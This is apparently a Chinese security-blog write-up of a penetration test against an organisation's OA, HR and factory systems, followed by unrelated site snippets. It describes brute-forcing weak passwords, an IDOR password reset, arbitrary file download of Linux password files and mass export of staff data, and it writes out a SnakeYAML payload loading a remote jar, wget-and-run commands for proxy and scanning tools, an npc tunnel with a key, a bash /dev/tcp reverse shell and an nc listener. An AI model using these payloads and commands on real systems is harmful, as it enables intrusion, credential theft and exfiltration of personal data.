某次项目练手记录

VSole2023-08-30 09:07:22

题记

最近做了一个项目,复盘以后感觉大佬就是大佬,比不了比不了。

我的思路

目标有3天半时间,半天信息收集,1天打外网,2天内网。首先通过收集到的信息通过脆弱点找内网突破口,找到突破口对内网进行测试。

Web端找入侵点

在外网发现OA系统与一个物业管理系统绑在一个ip地址上。在物业管理系统发现登陆账户上用户名写在页面上。

通过爆破发现存在弱口令,进入后台。

Getshell失败,放弃,好吧,是因为这个站太卡了,页面定时刷新,太恶心。

转到OA系统,通过爆破,成功爆破出一个账户,进入OA。进入OA后有一些好处,一个是有很多关联系统直接进入使用,另一个是可以获取OA里所有用户的信息对其他系统爆破,还有一个是翻阅OA里文件发现一些系统与一些默认密码,更甚者可以翻到vpn等信息。

通过OA可直接访问金蝶系统,邮箱系统。

在OA通过翻阅文档发现是共享采购平台用员工名字(在OA导出员工信息,把中文名用在线工具转成拼音)缩写,爆破,爆破出弱口令。

且此平台存在任意文件下载,下载到Linux密码文件。

Getshell点找找,都没找到,他们系统有一个特点,能传木马但是不解析,后续拿权发现目标网站全部都是jar包起的站点,是不能通过上传webshell提权的,只能内存马或者命令执行反弹shell。

后续外网又爆破了一堆后台,这里不一一列举了。下面写两个其他系统。

1、工厂管理系统(若依二开)

通过爆破拿到普通用户权限,在修改个人资料处发现越权漏洞。可以遍历所有用户信息,于是猜想修改密码处有越权。


成功越权修改密码,他对原密码并没有效验。使用管理员登录后台发现1万多信息,把运维人员,管理层人员,承运商信息,开发人员信息全部导出用于后续攻击。

本来想利用定时任务反弹shell的,经测试失败,他的定时任务没有填字符串的地方。


org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://xxx/payload-v2.jar"]]]]')

2、人事系统

前面拿到人事系统人员信息,利用拿到的信息定向爆破(使用工号登录后台),成功爆破出hr后台密码,拿到全部人员信息。

外网进内网的点

目标大量使用若依框架二开的站点,众所周知,若依使用了shiro的框架。所以他外网存在3,4个shiro反序列化漏洞。

这里我是利用一个上传nps代理进内网,一个上传fscan进行扫描,一个windows上线cs抓系统密码,浏览器密码。

1、上传nps代理进内网

mkdir ../test

本来我想用ew正向代理进去的,后来发现我不知道他的ip,这时候才知道大佬们为啥喜欢用nps,确实方便管理。


wget -P ../test http://xxx/ew_linux_x64chmod 777 ../test/ew_linux_x64../test/ew_linux_x64 -s ssocksd -l 9000

运行nps:

wget -P ../test http://ip/linux_amd64_client.tar.gztar -zxvf ../test/linux_amd64_client.tar.gz -C ../test../test/npc -server=ip:8024 -vkey=4z4oardkqdtu4ro6 -type=tcp

2、反弹shell

shiro拿到权限之后,经测试echo 'bash -i >& /dev/tcp/ip/7778 0>&1' > ../test/1.sh是不行的。最优解是先写好1.sh,然后控制肉鸡远程下载1.sh。


Vps监听端口:nc -nlvp 7778wget -P ../test http://xxx/1.sh../test/1.sh

上传fscan到目标上,本地挂代理扫会出各种各样问题。

wget -P ../test http://xxx/fscan_amd64../test/fscan_amd64 -h ip/16 -p 80 -np -nopoc -o b.txt

先探测存活的网段。


../test/fscan_amd64 -hf ip.txt -np -nopoc -o ip-c.txt


漏洞挖掘。

3、windows上线cs抓系统密码,浏览器密码。

翻到一些系统的管理员密码。登录后台。

内网横向

因为时间太短,内网我的成果不是很多。下面主要记录内网经常要用到的思路。


内网资产搜集;多关注windows系统,可以用永恒之蓝渗透;关注nacos、vmware等可控制大部分主机的系统;利用漏洞获取数据库,系统密码,然后利用密码对跑出的22,3306,1433,445等端口进行密码撞库。

大佬思路

1、重点找运维人员的信息。

其他技术问题

1、拿到服务器权限发现是jar包起的web站点。

这时候可以吧jar包复制到其他目录,然后后缀改成zip,解压后就可以拿到配置文件,翻数据库密码。

test
本作品采用《CC 协议》,转载必须注明作者和本文链接
AV-TEST 和 AV-Comparatives 是两家知名的反恶意软件评估公司。尽管久负盛名,但是前者遇到了一件尴尬的事情:官方 Twitter 账号于 7 月 25 日被黑了,但时间过去 1 周仍未恢复对其的控制。
前不久,国际权威测评机构AV-TEST发布了最新的企业安全产品测评结果,在测评的19个企业级终端安全产品中,深信服EDR在检测能力、性能消耗以及可用性三个评估维度拿到了全部满分(6分为满分)的好成绩,也是国内首个全部满分的终端安全产品,意味着深信服EDR在终端安全防护能力上获得了的专业肯定与认可。
AV-TEST统计数据显示,2022年在Windows平台上发现了近 7000 万个新的恶意软件样本;macOS 上只有大约 1.2 万个恶意软件。
编写测试代码和编写普通的Go代码过程是类似的,并不需要学习新的语法、规则或工具。go test命令是一个按照一定约定和组织的测试代码的驱动程序。
主要测试思路xss:test+()@example.com. Header注入"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com. "recipient@test.com>\r\nRCPT TO:test.com
它通过解压缩 APK 并应用一系列规则来检测这些漏洞来做到这一点https://github.com/SUPERAndroidAnalyzer/super9、AndroBugs 框架是一种高效的 Android 漏洞扫描程序,可帮助开发人员或黑客发现 Android 应用程序中的潜在安全漏洞。它可以修改任何主进程的代码,不管是用Java还是C/C++编写的。
在整个软件开发生命周期中,可以在开发与测试阶段中使用IAST工具。之后启动tomcat,查看agent是否正常上线。再看一下请求信息,通过请求信息找一下代码入口,入口是在DocController.java的deleteDoc方法中。529行调用deleteDoc,跟入deleteDoc函数。deleteRealDoc中直接对原始请求参数进行拼接,完成文件删除,触发漏洞。通过数据流图也可以初步判断漏洞是否存在,假如通过修改传入的污点值可以在最后危险函数处进行漏洞触发,即可认为是存在漏洞的。
位于德国的IT安全研究机构AV-TEST发布了针对Windows 10家庭用户的2021年10月最佳杀毒程序评估报告。
|常见扫描器特征
2021-10-28 07:42:24
by_wvs. acunetix. acunetix_wvs. acunetix_test. headersAcunetix-Aspect-Password:. Cookie: acunetixCookie. Cookie: acunetix.
常见扫描器特征
2021-10-25 04:13:52
url acunetix-wvs-test-for-some-inexistent-file by_wvs acunetix_wvs_security_test acunetix acunetix_wvs acunetix_test
VSole
网络安全专家